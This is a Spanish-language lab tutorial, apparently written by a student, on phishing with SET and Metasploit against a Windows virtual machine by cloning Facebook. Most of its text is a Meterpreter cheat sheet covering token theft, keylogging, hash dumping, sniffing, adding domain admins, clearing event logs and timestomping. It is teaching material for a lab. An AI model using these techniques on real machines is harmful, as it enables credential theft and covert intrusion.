top of page

PHISHING CON SETOOLKIT

Aquí se realizará una demostración acerca de un ataque de phishing con la distribución de Kali desde una máquina virtual a un ordenador con Windows. Se efectuará el ataque realizando la clonación de la página web de Facebook, utilizando las herramientas SET y Metasploit para cargar un Java Applet en un ordenador con Windows.

¿Sabes que es el phishing? Es uno de los métodos más utilizados por ciberdelicuentes para estafar y obtener información confidencial como puede ser tu contraseña o información detallada sobre tus tarjetas de crédito. El estafador o phisher se hace pasar por una institución o empresa de tu confianza para así obtener tus datos e información para extorsionarte o hacer mal uso de ella

INDICE

  1. Requisitos previos

  2. Ingreso y actualización a setoolkit

  3. Phishing. Clonación de Facebook con set y Metasploit

  4. Configuración del meterpreter

  5. Verificando conexiones y realizando pruebas de penetración

  6. Comandos de meterpreter

  7. Webgrafía

1- Requisitos previos

Para la realización de esta actividad necesitamos como requisitos previos los siguientes equipamientos mínimos:

Computadora Kali Linux Num. Procesadores: 2 Memoria: 2GB Disco: 20 GB Red: conexión tipo bridge (ip. estática)

Computadora Windows 10 (Máquina virtual) Num. Procesadores: 2 Memoria: 2GB Disco: 20 GB Red: conexión tipo bridge


2- Ingreso y actualización a setoolkit

Para ingresar al setoolkit colocamos en Kali desde la terminal la siguiente orden:

# sudo setoolkit.

Dentro de la misma ingresamos la opción 4 si queremos actualizar a la última versión.


3- Phishing. Clonación de Facebook con set y Metasploit

Para realizar el ataque de Ingeniería social escogemos la opción 1 del menú.




4- Configuración del meterpreter

En este punto lo que vamos hacer es generar el payload (código arbitrario) para inyectar en la máquina víctima. Lo hacemos de la siguiente manera:




5- Verificando conexiones y realizando pruebas de penetración

Luego de haber configurado el meterpreter automáticamente ingresamos a la consola de metasploit y podemos verificar las sesiones y ejecutar diferentes comandos.











6.- Comandos de meterpreter

  • help: Abrir uso ayuda Meterpreter

  • run scriptname: Ejecutar Meterpreter-basado en scripts, para obtener una lista completa de scripts/meterpreter en el directorio.

  • sysinfo: Mostrar la información del sistema en el destino remoto.

  • ls: Lista de archivos y carpetas en el objetivo.

  • use priv: Cargue el privilegio de la extensión para extender la librería el Meterpreter.

  • ps: Mostrar todos los procesos en ejecución y que las cuentas estén asociadas con cada proceso.

  • migrate PID: Migrar específicamente el proceso de ID (PID es el objetivo del proceso ID ganadodesde el comandos PS)

  • use incognito: Cargar funciones incógnitas. (Se utiliza para robar fichas y suplantación de una máquina de destino)

  • list_tokens -u: Lista fichas disponibles en el objetivo por el usuario.

  • list_tokens -g: Lista fichas disponibles en el objetivo por el grupo.

  • impersonate_token DOMAIN_NAME\\USERNAME: Hacerse pasar por una ficha disponible en el objetivo.

  • steal_token PID: Robar las fichas disponibles para un determinado proceso y hacerse pasar por esa señal.

  • drop_token: Deje de hacerse pasar por el token actual.

  • getsystem: Intento de elevar los permisos de acceso a nivel de sistema a través de múltiples vectores de ataque.

  • shell: Caer en un shell interactivo con todas las fichas disponibles.

  • execute -f cmd.ex -i – Ejecutar cmd.exe interactuar con él.

  • execute -f cmd.ex -i -t – Ejecutar cmd.exe con todas las fichas disponibles.

  • execute -f cmd.ex -i -H -t – Ejecutar cmd.exe con todas las fichas disponibles y convertirlo en un proceso oculto.

  • rev2self: Volver al usuario original que utilizó para poner en peligro el objetivo.

  • reg command: Interactuar, crear, eliminar, consultar, set, y mucho más en el registro del destino.

  • setdesktop number: Cambiar a una pantalla diferente en función de quién está conectado.

  • screenshot: Tome una captura de pantalla de la pantalla del destino.

  • upload file: Subir un archivo a la objetivo.

  • download file: Descargar los archivos desde el objetivo.

  • keyscan_start: detecte las pulsaciones de teclado en el destino remoto.

  • keyscan_dump: Volcar las teclas remotas capturados en el objetivo.

  • keyscan_stop: Deje de detectar las pulsaciones de teclado en el destino remoto.

  • getprivs: Obtener tantos privilegios como sea posible en el objetivo.

  • uictl enable keyboard/mouse: Toma el control del teclado y/o ratón.

  • backround: Ejecute su shell actual Meterpreter en el fondo.

  • hashdump: Volcar todos los hashes enel objetivo.

  • use sniffer: Cargue el módulo sniffer.

  • sniffer_interfaces: Lista de interfaces disponibles al objetivo.

  • sniffer_dump interfaceID pcapname: Comience sniffer en el destino remoto.

  • sniffer_start interfaceID packet-buffer: Comience sniffer con una gama específica para un buffer de paquetes.

  • sniffer_stats interfaceID: Coge la información de estadística de la interfaz que está en sniffer.

  • sniffer_stop interfaceID: Detenga el sniffer D:

  • add_user username password -h ip: Agregar un usuario en el destino remoto.

  • add_group_user “Domain Admins” username -h ip: Añadir un nombre de usuario al grupo Administradores de dominio en el destino remoto.

  • clearev: Borrar el registro de eventos en el equipo de destino.

  • timestomp: Cambiar atributos de archivo, como fecha de creación (antiforensics medida)

  • reboot: Reinicie el equipo de destino.

7.- Webgrafía


Comments


bottom of page